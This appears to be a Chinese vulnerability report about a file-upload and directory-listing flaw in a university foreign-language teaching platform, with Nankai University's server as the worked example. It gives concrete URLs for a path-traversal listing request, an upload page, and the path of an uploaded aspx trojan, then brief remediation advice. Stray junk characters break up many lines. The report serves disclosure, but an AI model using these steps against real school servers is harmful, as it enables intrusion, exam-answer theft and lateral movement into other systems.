新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

0 _4 a' b0 o, \, w, m详细说明：
$ d3 c- J2 X, Q
  R) y" C2 @% P以南开大学的为例:
9 v" @1 y: Z+ S7 r! M/ Yhttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
$ H/ b, v8 H; Q+ N" u! |<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
8 Y$ e1 t" i' F6 ~" y. N% {, j</setting>
7 }# G6 ^7 u/ y: `1 u及版本号
/ s* B0 w( U3 X1 s  x9 b( r9 i<add key="TVersion" value="1, 0, 0, 2187">
  X$ T; n- V1 ^" _6 o</add>
6 P0 @8 A: V7 N& w4 r: z直接访问
" R& i% y1 E. C+ w: X& `7 V% {% yhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
# x' Z, b$ ~! _进一步列目录（返回的网页很大，可以直接 wget 下来）
* e& i2 h7 u; i1 N  ?http://222.30.60.3/NPELS/CommonS ... List?version=../../

/ p' i0 \' Q! A6 l1 i# U5 L& y发现
" c  f- Y1 w- t1 H) Rhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
1 h1 y8 d' H, x8 n- s) k* n1 [可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
0 W. h2 D, K: l+ @
OOXX
* u- R& x" ?3 o% s+ b3 d4 Y
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
1 k, u" x% T" m; E& }+ n漏洞证明：
$ }# _* P/ |0 j% G7 d6 j; D
. K1 s; q2 Q  H2 |, M3 ]列目录：
6 Z7 W: |! ^4 _6 Ohttp://222.30.60.3/NPELS/CommonS ... List?version=../../
# X2 a& Y6 w" L) {文件上传：
8 A( n4 D) i+ O: o, Q# b* e! zhttp://222.30.60.3/npelsv/editor/editor.htm
2 }- a# E# j- k; x- S" m0 c
上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

3 x  X- n+ {; O# f+ n8 C$ J3 ~- o* j修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
6 g7 ?% ~" b# A/ g: Q并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​